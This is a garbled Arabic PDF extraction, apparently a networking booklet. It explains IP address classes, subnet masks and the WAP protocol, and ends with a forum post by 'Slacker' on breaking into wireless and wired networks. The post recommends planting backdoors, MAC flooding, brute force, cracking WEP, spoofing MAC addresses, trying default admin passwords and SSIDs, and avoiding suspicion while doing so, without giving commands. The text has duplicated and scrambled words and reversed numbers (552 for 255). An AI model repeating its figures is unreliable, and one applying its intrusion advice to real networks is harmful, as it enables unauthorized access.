‬‬ ‫م عشريً محصوًر بین ‪ ، 552-0‬تدعى ھذه‬ ‫بوساطة نقاط‪ .‬تمثل كل ثمانیة رق ً‬ ‫اا‪                           ‬‬ ‫ا‬ ‫ا‬ ‫البنیة بالتمثیل العشري المنقط ‪ .dotted decimal notation‬يمثل العنوان التالي‬ ‫ي‬ ‫التمثیل‪                                                       :‬‬ ‫‪:‬‬ ‫مثا ً على ھذا‬ ‫ل‪                                                                          ‬‬ ‫ل‬ ‫‪                                     841‬‬ ‫‪                                             Address Classes‬‬ ‫‪A‬‬ ‫صفوف العناوين‬ ‫للشبكات‪  .‬‬ ‫‪.‬‬ ‫عرفت جماعة النترنت خمسة صفوف للعنونة لتلئم أحجام مختلفة‬ ‫لعنونة‪    ‬‬ ‫ة‬ ‫يحدد كل صف البتات المستخدمة لعنونة الشبكة والبتات المستخدمة‬ ‫اا‪    ‬‬ ‫ض‪    ‬‬ ‫ض‬ ‫المحطات‪ .‬لذلك يحدد كل صف عدد الشبكات الممكن عنونتھا كما يحدد أي ً‬


‫شبكة‪                                 .‬‬ ‫‪.‬‬ ‫عدد المحطات القابلة للعنونة ضمن كل‬ ‫يبین الجدول التالي المعرفات المستخدمة للشبكة وللمحطات ضمن صفوف ‪A,‬‬ ‫‪                                                                 :B, and C‬‬ ‫الصف ‪                                                                     A‬‬ ‫ن‪        ‬‬ ‫ُنسب عناوين الصف ‪ A‬إلى الشبكات التي تحتوي على أعداد ً كبیرة من‬ ‫ت‪                 ‬‬ ‫ت‬ ‫ا‬ ‫ا‬ ‫المحطات‪ .‬يكون البت ذو الترتیب العلى من عنوان ما يتبع إلى الصف ‪ A‬مساويً‬ ‫للشبكة‪     ‬‬ ‫ة‬ ‫إلى الصفر‪ .‬كما تستخدم السبعة بتات التالیة من أول بايت كمعرف‬ ‫ل‪       ‬‬ ‫‪ .Network ID‬أما البتات الباقیة (‪ 42‬بت) فتستخدم لعنونة المحطات داخل‬ ‫ملیون‪     ‬‬ ‫ن‬ ‫الشبكة‪ .‬ھ ذا يسمح بعنونة ‪ 621‬شبكة (من ‪ 1‬إلى ‪ )621‬وحوالي ‪71‬‬ ‫شبكة‪                                                      .‬‬ ‫‪.‬‬ ‫محطة ضمن كل‬ ‫الصف ‪                                                                     B‬‬ ‫ُنسب عناوين الصف ‪ B‬إلى الشبكات متوسطة الحجم‪ُ .‬قسم البتات كما يلي‪::‬‬ ‫ت‪                       ‬‬ ‫ت‬ ‫ت‬ ‫ف‪                 ‬‬ ‫‪ -1‬البتان ذو الترتیب العلى يأخذان القیمة ‪ 01‬لتحید نوع الصف‬ ‫ة‪                          ‬‬ ‫‪ -2‬تستخدم الربعة عشرة بت التالیة كمعرف للشبكة‬ ‫ة‪         ‬‬ ‫‪ -3‬تستخدم الستة عشرة بت الخیرة لعنونة المحطات ضمن كل شبكة‬ ‫ھذا يسمح بعنونة ‪ 483.61‬شبكة و ‪ 435.56‬محطة ضمن كل شبكة‪            ..‬‬ ‫الصف ‪                                                                     C‬‬ ‫ت‪ ‬‬ ‫ُنسب عناوين الصف ‪ C‬إلى الشبكات المحلیة الصغیرة ‪ .LANs‬وتوزع البتات كما‬ ‫يلي‪                                                                       :‬‬ ‫‪:‬‬ ‫‪                                        011‬‬ ‫‪0‬‬ ‫‪ -1‬تأخذ البتات الثلث الول القیمة‬ ‫ة‪                   ‬‬ ‫‪ -2‬تستخدم البتات الحدى والعشرين التالیة كمعرف للشبكة‬ ‫ة‪             ‬‬ ‫‪ -3‬تستخدم البتات الثمانیة الباقیة لعنونة المحطات ضمن كل شبكة‬ ‫ب و ‪ 452‬محطة ضمن كل شبكة‪          ..‬‬ ‫ھذا يسمح بعنونة ‪ 2‬ملیون شبكة تقري ً‬ ‫اا‪                                      ‬‬ ‫الصف ‪                                                                    D‬‬ ‫ة‪ ‬‬ ‫تستخدم عناوين الصف ‪ D‬للمجموعات متعددة النقاط‪ .‬يمكن للمجموعة متعددة‬ ‫كما‪     ‬‬ ‫النقاط أن تحوي على محطة أو أكثر أو حتى أن تكون فارغة‪ .‬توزع البتات ا‬ ‫‪                                     941‬‬ ‫يلي‪                                                                       :‬‬ ‫‪:‬‬ ‫‪                                     0111‬‬ ‫‪0‬‬ ‫‪ -1‬تأخذ البتات الربعة الول القیمة‬ ‫ن‪      ‬‬ ‫‪ -2‬تستخدم الربعة والعشرين بت الباقیة لعنونة المجموعات والتي يمكن‬ ‫ذا‪ ‬‬ ‫للمستخدم النضمام إلیھ ا‪ .‬ل توجد بتات خاصة بالشبكة أو بالمحطة ضمن ھ ا‬ ‫كل‪    ‬‬ ‫الصف من العناوين‪ .‬تمرر الطرود إلى مجموعة جزئیة من المحطات ضمن ل‬ ‫شبكة‪ .‬فقط المحطات المسجلة ضمن مجموعة متعددة النقاط تستقبل الطرد‪..‬‬ ‫الصف ‪                                                                     E‬‬ ‫تستخدم عناوين الصف ‪ E‬كعناوين تجريبیة غیر متوافرة للستخدام العام‪ .‬كماا‪   ‬‬ ‫أنھ ا محجوزة لستخدامات مستقبلیة‪ .‬تبدأ ھذه العناوين بالقیمة ‪        .1111‬‬ ‫العناوين‪                                                  ‬‬ ‫ن‬ ‫ملخص عن صفوف‬ ‫نلحظ أن المجموع العام للمحطات القابلة للعنونة ضمن كافة الصفوف السابقة‬ ‫ة‬ ‫محطة‪                                            .‬‬ ‫‪.‬‬ ‫تصل إلى ‪826.413.027.3‬‬ ‫العنونة‪                                                        ‬‬ ‫ة‬ ‫إرشادات حول‬ ‫والمحطات‪    :‬‬ ‫‪:‬‬ ‫يجب النتباه إلى الرشادات التالیة عند نسب معرفات الشبكات‬ ‫ة‪  ‬‬ ‫‪ -1‬ل يمكن لرقم الشبكة أن يأخذ القیمة ‪ - 721‬تحجز ھذه القیمة إلى وظیفة‬ ‫‪                                    loopback‬‬ ‫‪l‬‬ ‫الفحص الذاتي لبطاقة الشبكة‬ ‫ه‪      ‬‬ ‫‪ -2‬ل يمكن لمعرفات الشبكة والمحطة أن تأخذ جمیعً القیمة ‪ -‬تحجز ھذه‬ ‫اا‪                         ‬‬ ‫ة‪                            ‬‬ ‫القیمة كتعمیم ‪ broadcast‬على الشبكة المحلیة‬


‫‪ -3‬ل يمكن لمعرفات الشبكة والمحطات أن تأخذ جمیعً القیمة صفر‪ .‬تحجز ھذه‬ ‫ه‬ ‫اا‪                       ‬‬ ‫القیمة كعنوان للشبكة ذاتھاا‪                                                 ‬‬ ‫‪ -4‬يجب أن يكون عنوان المحطة وحید ً بالنسبة لعنوان الشبكة‪                ..‬‬ ‫اا‪                                        ‬‬ ‫‪                                          Network ID‬‬ ‫‪N‬‬ ‫َسب ُعرفات الشبكة‬ ‫ن‪                                                                     ‬‬ ‫ن‬ ‫م‬ ‫الموجودة‪     ‬‬ ‫ة‬ ‫يحدد "معرف الشبكة" المحط َ المستخدمة لبروتوكولت ‪TCP/IP‬‬ ‫ة‪                                               ‬‬ ‫ة‬ ‫على‪      ‬‬ ‫على نفس الشبكة الفیزيائیة‪ .‬يجب على جمیع المحطات المرتبطة ى‬ ‫تستطیع‪     ‬‬ ‫ع‬ ‫شبكة فیزيائیة واحدة أن تأخذ نفس عنوان (معرف) الشبكة حتى‬ ‫ا‪                                                           .‬‬ ‫التصال مع بعضھ ‪.‬‬ ‫مختلفة‪   ‬‬ ‫ة‬ ‫كما يجب أن تأخذ جمیع المحطات بما فیھ ا بوابات المسیرات معرفات‬ ‫ا‪                                                                  .‬‬ ‫عن بعضھ ‪.‬‬ ‫‪       IP‬‬ ‫يكون عنوان ‪ IP‬لبوابة المسیر المربوطة إلى الشبكة ھو نفسه عنوان ‪I‬‬ ‫‪                                    051‬‬ ‫م‪    ‬‬ ‫المعرف كعبارة افتراضیة ‪ default gateway‬لدى أي محطة عمل عندما يتم‬ ‫ة‪       ‬‬ ‫إعداد ‪ TCP/IP‬لديھ ا‪ .‬فیمكننا مث ً تحديد للحاسب الموجود على الشبكة‬ ‫ل‪                                            ‬‬ ‫ل‬ ‫‪1 Subnet‬ذو العنوان ‪ 72.0.0.421‬عنوان العبارة الفتراضیة ‪          .1.0.0.421‬‬ ‫للمحطات‪                                                 ‬‬ ‫ت‬ ‫المعرفات المقبولة‬ ‫شبكة‪  ‬‬ ‫ة‬ ‫بین الجدول التالي المجالت المقبولة لمعرفات المحطات بالنسبة لي‬ ‫خاصة‪                                                                     :‬‬ ‫‪:‬‬ ‫المحطات‪                                       ‬‬ ‫ت‬ ‫مقترحات حول تعیین معرفات‬ ‫برقم‪     ‬‬ ‫م‬ ‫ل توجد قواعد خاصة بالنسبة لتعیین معرفات المحطات (الجزء الخاص‬ ‫المحطة ضمن عنوان ‪ .(IP‬فیمكن مث ً تعیین المعرفات بشكل متتالي أو بشكل‬ ‫ل‬ ‫ل‪                                        ‬‬ ‫ل‬ ‫يسھل حفظه‪ .‬فمث ً‪                                                       ::‬‬ ‫ل‪                                                        ‬‬ ‫ل‬ ‫م‪   ‬‬ ‫‪ -1‬تقسیم معرفات المحطات إلى مجموعات حسب نوع الحاسب أو المخدم‬ ‫‪ -2‬تحديد المسیرات حسب عناوينھم‪                                         ‬‬ ‫‪                                  Subnet Mask‬‬ ‫‪S‬‬ ‫مفھوم قناع الشبكة الجزئیة‬ ‫يستخدم قناع الشبكة المؤلف من ‪ 23‬بت (مثله مثل عنوان ‪ (IP‬لتحقیق ماا‪    ‬‬ ‫يلي‪                                                                       :‬‬ ‫‪:‬‬ ‫ة‪   ‬‬ ‫‪ -1‬حجز قسم من عنوان ‪ IP‬للتمییز بین معرف الشبكة وبین معرف المحطة‬ ‫‪ -2‬التعبیر عن كون عنوان ‪ IP‬للمحطة الوجھة يقع على الشبكة المحلیة أوو‪     ‬‬ ‫بعیدة‪                                                          .‬‬ ‫‪.‬‬ ‫على شبكة‬ ‫ن‪ ‬‬ ‫يجب تعیین قناع شبكة لكل محطة مستخدمة لبروتوكولت ‪ .TCP/IP‬يمكن أن‬ ‫شبكات‪  ‬‬ ‫ت‬ ‫يأخذ ھ ذا القناع القیمة الفتراضیة عندما ل تكون الشبكة مجزأة إلى‬ ‫الجزئیة‪ .‬‬ ‫‪.‬‬ ‫جزئیة أو أي قیمة معرفة من قبل المستثمر في حال وجود الشبكات‬ ‫الفتراضي‪                                              ‬‬ ‫ي‬ ‫قناع الشبكة الجزئیة‬ ‫ى‪        ‬‬ ‫يستخدم قناع الشبكة الفتراضي في شبكات ‪ TCP/IP‬غیر المجزأة إلى‬ ‫على‪ ‬‬ ‫شبكات جزئیة‪ .‬يجب تعريف قناع الشبكة لدى جمیع المحطات الموجودة ى‬ ‫الشبكة‪                         .‬‬ ‫‪.‬‬ ‫الشبكة‪ .‬ھ ذا ويتعلق القناع الفتراضي بصف‬ ‫ة‪ ‬‬ ‫تأخذ جمیع البتات الموافقة لمعرف الشبكة القیمة "‪ "1‬أي أن القیمة العشرية‬ ‫ف‪      ‬‬ ‫لكل بايت تكون مساوية للقیمة "‪ ."552‬بینما تأخذ البتات الموافقة لمعرف‬ ‫"‪                                                        .‬‬ ‫المحطة القیمة "‪. 0‬‬ ‫ما‪                                                  ‬‬ ‫طريقة تحديد وجھة طرد ا‬ ‫ى‪   ‬‬ ‫يتم استخدام “‪ ”AND‬للتفرقة بین الطرود الموجھة إلى محطة محلیة (على‬ ‫‪                                    151‬‬


‫بعیدة‪                               .‬‬ ‫‪.‬‬ ‫نفس الشبكة الفیزيائیة) أو إلى محطة‬ ‫ع‪   ‬‬ ‫‪ -1‬عند إعداد ‪ ،TCP/IP‬تتم عملیة “‪ ”AND‬بین عنوان ‪ IP‬للمحطة وبین قناع‬ ‫ا‪                                                       .‬‬ ‫الشبكة المعرف لھ ‪.‬‬ ‫ع‪    ‬‬ ‫‪ -2‬قبل إرسال أي طرد تتم عملیة “‪ ”AND‬بین عنوان ‪ IP‬للوجھة وبین قناع‬ ‫المحلي‪                                                           .‬‬ ‫‪.‬‬ ‫الشبكة‬ ‫إذا تساوت نتائج المرحلة (‪ )1‬مع نتائج المرحلة (‪ )2‬فھذا يعني أن الطرد موجه‬ ‫ه‬ ‫موجه‪  ‬‬ ‫ه‬ ‫إلى محطة محلیة وإل فیتم إرسال الطرد إلى العبارة الفتراضیة (الطرد‬ ‫بعیدة)‪                                                         .‬‬ ‫‪.‬‬ ‫إلى محطة‬ ‫ع‪    ‬‬ ‫تتم عملیة “‪ ”AND‬بمقارنة كل بت من عنوان ‪ IP‬مع البت المقابل في قناع‬ ‫الشبكة‪ .‬فإذا أخذ البتان القیمة "‪ "1‬فتكون النتیجة "‪ "1‬وإل فالنتیجة تكون "‪. 0‬‬ ‫"‪.‬‬ ‫‪                                                              ...‬‬ ‫انتھـــــــى ‪.‬‬ ‫‪                                   251‬‬ ‫‪                (WAP‬‬ ‫(‬ ‫بروتوكول الستخدام اللسلكي (‬ ‫اللسلكي‪                                               ‬‬ ‫ي‬ ‫بروتوكول الستخدام‬ ‫‪                                               Wireless application protocol‬‬ ‫‪                                                                        )(WAP‬‬ ‫أو‪      ‬‬ ‫ل تستبعد إذا قلنا لك بأن بإمكانك أن تحجز تذكرتك أو أن ترى فیلم فیديو و‬ ‫ترسل‪ ‬‬ ‫ل‬ ‫تتعرف على آخر الخبار وتري تطورات السوق وتشتري وتبیع أسھمك أو‬ ‫ذا‪ ‬‬ ‫وتستقبل رسائل الكترونیة وغیرھ ا من المور المختلفة على النترنت‪...‬كل ھ ا‬ ‫كبیر‪    ‬‬ ‫وأنت تسیر متمشیا في الشارع‪ .‬نعم إن ذلك قد أصبح حقیقة إلى حد ر‬ ‫برنامج‪        ‬‬ ‫ج‬ ‫وذلك باستخدام التلفون المحمول " الموبايل" إذا كان محتويا على‬ ‫"واب"‪                                                                         .‬‬ ‫‪.‬‬ ‫واب ‪ WAP‬بدأنا نسمع به منذ أشھ ر قلیلة‪ ،‬والن ل يكاد أحد لم يسمع به‪ .‬ومنذ‬ ‫ذ‬ ‫كمبیوتر‪   ‬‬ ‫ر‬ ‫أن بدأ استخدامه كبرنامج داخل التلفون النقال‪ ،‬فقد أصبح وكأن لديك‬ ‫جیبك‪                                                                  .‬‬ ‫‪.‬‬ ‫داخل‬ ‫ن‪ ‬‬ ‫يعتقد المحللون بإنه بعد أقل من خمس سنوات فإن ‪ 072‬ملیون أوربي سیكون‬ ‫ت‪        ‬‬ ‫لديھم تلفونات نقالة‪ ،‬وأن حوالي ‪ %07‬من ھؤلء سیستعملون التلفونات‬ ‫المعتمدة على خدمة ‪ WAP‬للوصول إلى النترنت‪ .‬بل يعتقد الباحثون بأنه ما أن‬ ‫ن‬ ‫ع‪   ‬‬ ‫نصل لسنة ‪ 3002‬حتى يكون الناس الذين يمتلكون تلفونات نقالة متلئمة مع‬ ‫ة‪        ‬‬ ‫الواب ‪ WAP compatible phones‬ھ م أكثر عددا من الذين يمتلكون أجھزة‬ ‫كمبیوتر!‪                                                                      .‬‬ ‫‪.‬‬ ‫إذن ما ھو الواب ‪WAP‬؟‪                                                       ‬‬ ‫ة‪   ‬‬ ‫‪ WAP‬أو ‪ Wireless application protocol‬عبارة عن بیئة استخدام ومجموعة‬ ‫معیارية‪  ‬‬ ‫ة‬ ‫قواعد اتصال خاصة بأجھزة التصال اللسلكیة‪ ،‬تم تصمیمھا بمواصفات‬ ‫زة‪         ‬‬ ‫من أجل توحید أسلوب عمل معدات التصال مثل التلفون النقال والجھ ة‬ ‫ذلك‪     ‬‬ ‫المرسلة والمستقبلة من حیث إمكانیتھ ا الوصول إلى النترنت بما في ك‬ ‫المعلومات‪    ‬‬ ‫ت‬ ‫البريد اللكتروني والشبكة العنكبوتیة ومجموعات الخبار وخدمات‬ ‫والشراء‪   ‬‬ ‫ء‬ ‫المختلفة ووسائل التسلیة والثقافة وأعمال البنوك والسھم والتجارة‬ ‫ا‪                                    .‬‬ ‫عبر النترنت ومعرفة الحوال الجوية وغیرھ ‪.‬‬ ‫‪                                      351‬‬ ‫‪Wireless application protocol‬تعني بروتوكول الستخدام اللسلكي‪        ،،‬‬ ‫قواعد‪   ‬‬ ‫د‬ ‫وبالنسبة لتكنولوجیا المعلومات فإن كلمة بروتوكول عبارة عن مجموعة‬ ‫على‪     ‬‬ ‫ونظم خاصة تحكم عملیة التفاھم بین نقاط التصال النھائیة الموجودة ى‬ ‫شبكة التصالت‪ ،‬وذلك عندما تقوم تلك النقاط بإرسال واستقبال الشارات فیماا‬ ‫أن‪ ‬‬ ‫بینھا‪ .‬إن كل نقطة نھ ائیة يجب أن تتعرف على وتراقب تلك القواعد‪ .‬والعادة ن‬ ‫به‪                           .‬‬ ‫تكون تلك القواعد معیارية في المجال الذي تعمل ‪.‬‬ ‫أساسه‪   ‬‬ ‫ه‬ ‫وقد أصبح ھذا البروتوكول الن ھو المعیار القیاسي الذي يعمل على‬ ‫‪      Mobile‬‬ ‫‪M‬‬ ‫صانعي أنظمة التصال اللسلكیة المستخدمة مثل التلفون النقال‬ ‫ة‪          Personal Digital      ‬‬ ‫‪ Phones‬والجھزة الرقمیة الشخصیة المساعدة‬ ‫ة‪      ‬‬ ‫‪ Assistants (PDAs‬وراديو السیارات ‪ Car Radios‬وأجھزة البحث اللسلكیة‬


‫ي‪ ‬‬ ‫الخرى ‪ Navigation Systems‬وغیرھا من الجھزة الخرى والتي ھي الن في‬ ‫التطوير‪                                                              .‬‬ ‫‪.‬‬ ‫مراحل‬ ‫إن المواصفات المعیارية لھذا النظام ھي مواصفات دولیة‪ ،‬ومفتوحة بشكل تكون‬ ‫ن‬ ‫إعطاء‪    ‬‬ ‫ء‬ ‫فیه متاحه للجمیع من صانعین ومطورين ومستخدمین‪ ،‬وذلك من أجل‬ ‫الخدمات‪     ‬‬ ‫ت‬ ‫مستخدمي أجھزة التلفون النقال إمكانیات أكبر وأقوى للتعامل مع‬ ‫الحركة‪    ‬‬ ‫ة‬ ‫والمعلومات بشكل فوري‪ .‬كما أضاف ھ ذا البروتوكول للنترنت إمكانیة‬ ‫الوصول‪        ‬‬ ‫ل‬ ‫والنتشار الوسع‪ ،‬ويتم العمل على أن يجعل مالكي ھذا النظام‬ ‫وأفضل‪                                          .‬‬ ‫‪.‬‬ ‫والبحث في النترنت أسھل‬ ‫لكل‪ ‬‬ ‫ومع أن الوصول للنترنت بھذه الجھزة كان ممكننا في الماضي‪ ،‬حیث كان ل‬ ‫المختلفة‪  ‬‬ ‫ة‬ ‫من المصنعین تقنیته الخاصة به‪ ،‬إل أنه في المستقبل فإن المعدات‬ ‫ع‪  ‬‬ ‫الصنع‪ ،‬والتي تستعمل ‪ WAP‬سیكون بإمكانھا التفاھم مع بعضھا والتعامل مع‬ ‫النترنت‪                                                                     ‬‬ ‫ت‬ ‫الواب‪                                                      ‬‬ ‫ب‬ ‫مجلس مجموعة‬ ‫‪                                                               WAP Forum‬‬ ‫ونوكیا‪    ‬‬ ‫ا‬ ‫أوجد ھ ذا البروتوكول مجموعة من الشركات ھي إيريكسون ‪Ericsson‬‬ ‫‪ Nokia‬وموتورول ‪ Motorola‬بالضافة إلى شركة برامج أقل شھرة ھي أنوايردد‪   ‬‬ ‫‪   .Phone.com‬‬ ‫‪.‬‬ ‫بلنیت ‪ ،Unwired Planet‬والتي أسمت نفسھا بعد ذلك بإسم‬ ‫س‪      ‬‬ ‫وقد تم ذلك في صیف ‪ ،7991‬حیث تكون من أجل ذلك ما إسمي بمجلس‬ ‫ض‪         ‬‬ ‫مجموعة الواب ‪ (The WAP forum (www.wapforum.org‬وكان الغرض‬ ‫‪                                     451‬‬ ‫الساسي منه ھ و من أجل تحديد إيجاد قوة ضغط تستطیع وضع مواصفات عامة‬ ‫ة‬ ‫وأن‪ ‬‬ ‫لھ ذه الصناعة وذلك لتطوير الستخدامات عبر شبكات التصالت اللسلكیة‪ ،‬ن‬ ‫ل يتم إحتكار ذلك تجاريا‪ .‬بالضافة إلى أن من أھدافه ھو جمع وإحضار الشركات‬ ‫ت‬ ‫توحید‪        ‬‬ ‫د‬ ‫العاملة في كافة مجالت أعمال الصناعات اللسلكیة للتأكید على‬ ‫فإن‪       ‬‬ ‫مواصفاتھا بالتقید يقواعد ھ ذا البروتوكول‪ .‬وكما في بروتوكول النترنت ن‬ ‫بالضافة‪   ‬‬ ‫ة‬ ‫بروتوكول الستخدام اللسلكي يتمیز بأنه بروتوكول معیاري عالمي‪.‬‬ ‫أصبح‪  ‬‬ ‫ح‬ ‫إلى أن ملكیته وإمكانیة التحكم به ل تعود لحد أو لية شركة‪ .‬والن فقد‬ ‫عدد أعضائه عدة مئات من الشركات من كافة الصناعات التي يتصل عملھاا‪      ‬‬ ‫حلول‪  ‬‬ ‫ل‬ ‫بالنترنت مثل مزودي الخدمة ومصممي البرامج والمنظمات التي تعطي‬ ‫م‪         ‬‬ ‫خاصة في مجال التصالت اللسلكیة‪ .‬كما أن من ضمن أعضائه من ھم‬ ‫م‪  ‬‬ ‫مسئولین عن أكثر من ‪ %09‬من العاملین في مجال التلفون النقال في العالم‬ ‫مشترك‪                             .‬‬ ‫‪.‬‬ ‫أجمع‪ ،‬والذين لديھ م أكثر من مئة ملیون‬ ‫‪                                   551‬‬ ‫اللسلكیة‪                       ‬‬ ‫ة‬ ‫الشبكات‬ ‫‪                                                        Slacker‬‬ ‫‪S‬‬ ‫للكاتب‪:‬‬ ‫مناقشة‪                                                                      :‬‬ ‫‪:‬‬ ‫اوضحلك‪   ‬‬ ‫ك‬ ‫بس على العموم حتى لاكون اجیب لكم من دون ادلة ‪...‬خلیني‬ ‫التناقض‪                                                                  ‬‬ ‫ض‬ ‫شوف‬ ‫حقیقه ااختراق الشبكات من المواضیع المھمه جداا اللي غالبا ماتجد لھاا‪      ‬‬ ‫موضوع ايتكلم عنھاا‪                                                              ‬‬ ‫كانت‪  ‬‬ ‫وانا شايف الكل يبي يعرف كیف يتم اخترااق الشبكات او الشبكه سواء ت‬ ‫وايرلس‪                                                                   ‬‬ ‫س‬ ‫واير او‬ ‫اخر‪ ‬‬ ‫يعني اغلبنا يكون يستخدم كمبیوتر في جـامعه مثل ويبي يوصل لكمبیوتر ر‬ ‫الدمنستور‪                                                           ‬‬ ‫ر‬ ‫او كمبیوتر‬ ‫مطاااار!!!‪                          ‬‬ ‫!‬ ‫او في مقھ ى انترنت او حتى في سوق او‬ ‫اسمه‪               ‬‬ ‫ه‬ ‫اخي العزيز في ھذا المنتدى ولیس في غیره طرح كتاب‬ ‫ى‪ ‬‬ ‫‪Stealing.the.Network.How.to.Own.the.Box‬اعتقد انه عندك ‪...‬في احدى‬ ‫قصصه يشرح كیف انه كان جالسا في المطار وكیف اخترق شبكة لسلكیة ‪...‬‬ ‫‪                                  ...‬‬ ‫والطريقة واقعیة جدا لتنقصل سوى خبرة ‪.‬‬ ‫العموم‪ ‬‬ ‫م‬ ‫اذن الطرق موجودة والدوات موجودة لكن نحن مانريد نشتغل ‪...‬على‬


‫‪                                             ...‬‬ ‫‪...‬بعض النقاط اشرحھا بايجاز ‪.‬‬ ‫سواء‪      ‬‬ ‫ء‬ ‫الشبكات سواء كانت سلكیة او لسلكیة يجب ان تكون عنوان ممیز‬ ‫دومین او رقم ‪IP‬لعملیات المسح ‪                                          ...‬‬ ‫لم‪   ‬‬ ‫في حال الشبكة لسلكیة عند اختراقك لھا يجب ان تكون عغضو فیھا ان م‬ ‫تكون موصولة بالنترنت وفي حال كانت موصولة وقتھ ا لتسمى شبكة تسمى‬ ‫ى‬ ‫اااااااامة‪                                                   ‬‬ ‫ة‬ ‫انترانت ھي نقطة ھ‬ ‫كانت‪   ‬‬ ‫الن الشبكات السلكیة سواء كنت عضو فیھا او لم تكن عضو او سواء ت‬ ‫‪                        ,,,,‬‬ ‫موصولة بالنترنت او لم تكن باستطاعتك اختراقھا ‪,‬‬ ‫ز‪        ‬‬ ‫الشبكة السلكیة لنتلكم في حال كنت عضو فیھا ‪..‬اكید حیكون الجاھز‬ ‫الساسي الي ھو الـ ‪Server‬اتكلم عن الشبكات الحقیقیة ولیس ‪ P2P‬ي‬ ‫يعني‬ ‫الي تعتمد مبدا ‪ Client/Server‬بشكل فعلي ولیس شكلي تتراوح الطرق من‬ ‫ن‬ ‫السھ ولة حیث ان تمكنت من الجلوس علیه لفترة بامكانك زرع باكدوور او حتى‬ ‫ى‬ ‫م‪   ‬‬ ‫انك تعمل ھجوم ‪Mac Flood‬او مايسمى ‪MacOF Attacking‬وعندك ھجوم‬ ‫بالنجلیزي‪                                  ‬‬ ‫ي‬ ‫القوة العنیفة ناسي شلون نتكتب‬ ‫‪                                      651‬‬ ‫طبعا الن تتجه اغلب الشركات الى الشبكات السلكیة وھنا مربط الفرس حیث‬ ‫ث‬ ‫الغالي‪                                   ‬‬ ‫ي‬ ‫لھا مستقبل حتى في وطننا العربي‬ ‫حیث تم الن وفي مصر انشاء بعض النقاط الساخنة الي اذا وقفت علیھا تحرقك‬ ‫ك‬ ‫قصدي نقاط اتصال ‪Hot Spot‬لكي تتصل بالنترنت وانت تاكل الھامبرجرمن عند‬ ‫د‬ ‫انیابك‪                        ‬‬ ‫ك‬ ‫ماكدونالد وانت رافع العلم المريكي ومكشر عن‬ ‫مثل‪     ‬‬ ‫او حتى وانت في الحمام عم تعمل دوش ساخن والبتوب بین رجلیك ل‬ ‫المھم ھذه نقاط التصال وايضا تقنیة ‪ Voice Over IP‬الي اذا استعملھا‪       ‬‬ ‫وتقنیة‪                  ‬‬ ‫ة‬ ‫السوريین سوف يتعرضون للحبس والمخالفات المالیة‬ ‫ة‪                                    ‬‬ ‫‪Wi­Fi‬لاعرف ان كانت كلمة تقنیة جیدة‬ ‫لسلكي‪               ‬‬ ‫ي‬ ‫المھم كلھا تعمد على انو يكون في جھازك كرت شبكة‬ ‫یة‪     ‬‬ ‫الن بابسط الشكال لكي تخترق مثل ھ ذه الشبكة يجب توفر امور بديھ ة‬ ‫ب‪                                                                ‬‬ ‫‪1‬جھاز لبتوب‬‫ي‪                                                      ‬‬ ‫‪2‬كرت شبكة لسلكي‬‫ة‪                                               ‬‬ ‫‪3‬ان تكون بمجال تردد الشبكة‬‫ي‪                                                       ‬‬ ‫‪4‬لقط الشارة اختیاري‬‫السلكیة‪                        ‬‬ ‫ة‬ ‫ديجب مراعاة عدة امور في اختراق الشبكات‬ ‫ان تاخذ ركن ماحد يشك فیك يقوموا بفكروك ارھابي بتاع تفجیرات جدة او حتى‬ ‫ى‬ ‫ادي‪                                                ‬‬ ‫لبنان يعني خذلك مكان ھ ي‬ ‫مثل‪                                                          ‬‬ ‫استعمل برامج ل‬ ‫<‪netstumbler <http://www.netstumbler.com /‬لويندوز و‪                  ‬‬ ‫ه‪                                         ‬‬ ‫‪Wellenreiter‬لنظمة لینكس واخواته‬ ‫الى‪                                                      ‬‬ ‫ويجب علیك النتباه ى‬ ‫‪1‬كلمة السر الفتراضیة للبشبكة تاتي عادة ‪Admin‬في حال لقطت شبكة من‬‫ن‬ ‫سر‪         ‬‬ ‫الممكن يكونوا مغیرينھ ا ومن الممكن ل ومن الممكن ماتجد كلمة ر‬ ‫ت‪  ‬‬ ‫‪2‬تشفیر البیانات تتبع الشبكة السلكیة طرق تشفیر يعني ممكن ان تتنصت‬‫البیانات‪       ‬‬ ‫ت‬ ‫على المعلومات وتعرف تردد الشبكة وكل ھذه المور بس تصلك‬ ‫ماعتقد‪                                     ‬‬ ‫د‬ ‫مشفرة ‪..‬والتقنیة اسمھا علىل‬ ‫‪    packetstormsecurity‬‬ ‫‪p‬‬ ‫‪Wired Equivalent Privacy‬وھناك اداوت تجده في‬ ‫ز‪                      ‬‬ ‫<‪<http://packetstormsecurity.nl /‬لكسر ھذه الترامیز‬ ‫ن‪                                                              ‬‬ ‫‪4‬فلترة العناوين‬‫بطل قصة كتاب ‪Stealing.the.Network.How.to.Own.a.Continent‬مات بسب‬ ‫ب‬ ‫‪                                          MAC Address‬‬ ‫‪M‬‬ ‫نسیانه تزوير عناوين‬ ‫‪                                     751‬‬ ‫يعني‪   ‬‬ ‫اعتقد انه ھناك اخوة في ھ ذا المنتدى قد طرحوا مواضیع ووضحوا ماذا ي‬ ‫‪                                                                         MAC Address‬‬


‫المھ م لكل كرت شبكة عنوان ممیز بوضعه الشركة المصنعة للكرت وھو عناون‪ ‬‬ ‫فیزيائي ولیس ھناك مجال للتطابق الرقام نھائیا وا حتى تكرارھا وكما ھو‪     ‬‬ ‫معروف فان نقطة التصال في مكونات الـ ‪ OSI Model‬للشبكات للمزيد اقرا‪    ‬‬ ‫وثائق ‪ RFC‬تعامل مع الـ ‪MAC Address‬ولیس الـ ‪ IP‬فمن ھنا من الممكن ان‪ ‬‬ ‫تحدد مجموعة المستخدمین في شبكتك وتمنع اي اتصال اخر من اي عنوان‪   ‬‬ ‫غیر محدد‪                                                                              ‬‬ ‫تدعي ھذه الطريق بـ ‪Deny ALL, Allow some‬ولنفرض انت قدرت تحدد ‪ MAC‬‬ ‫‪ Address‬بتاع الشبكة بتزوير للباكیت المرسلة تكون كعضو موثوق‪               ‬‬ ‫ ‪5‬معرف الخدمة او الـ ‪                                                            SSID‬‬‫اختصارا لـ ال ‪Service Set Identifier‬او معرف الخدمة كل نقطة اتصال لھا ‪SSID‬‬ ‫معین ويكون معروف من جھ ة مستخدمي الشبكة والفائدة منه ھي انني‪      ‬‬ ‫ولنفرض لست بمقر الشركة ولكنني ضمن نطاق مجال الشبكة موجود فیه‪    ‬‬ ‫بامكاني عن طريق احد برمجیات الشكبات التصال ووالتعريف عن نفسي عن‪  ‬‬ ‫طريق الـ ‪                                                                         SSID‬‬ ‫ولكن المشكلة ان ھذا الـ ‪ SSID‬ياتي احیانا بشكل افتراضي وينسى مدير‪     ‬‬ ‫الشبكة تغییرة وتكون عرضة 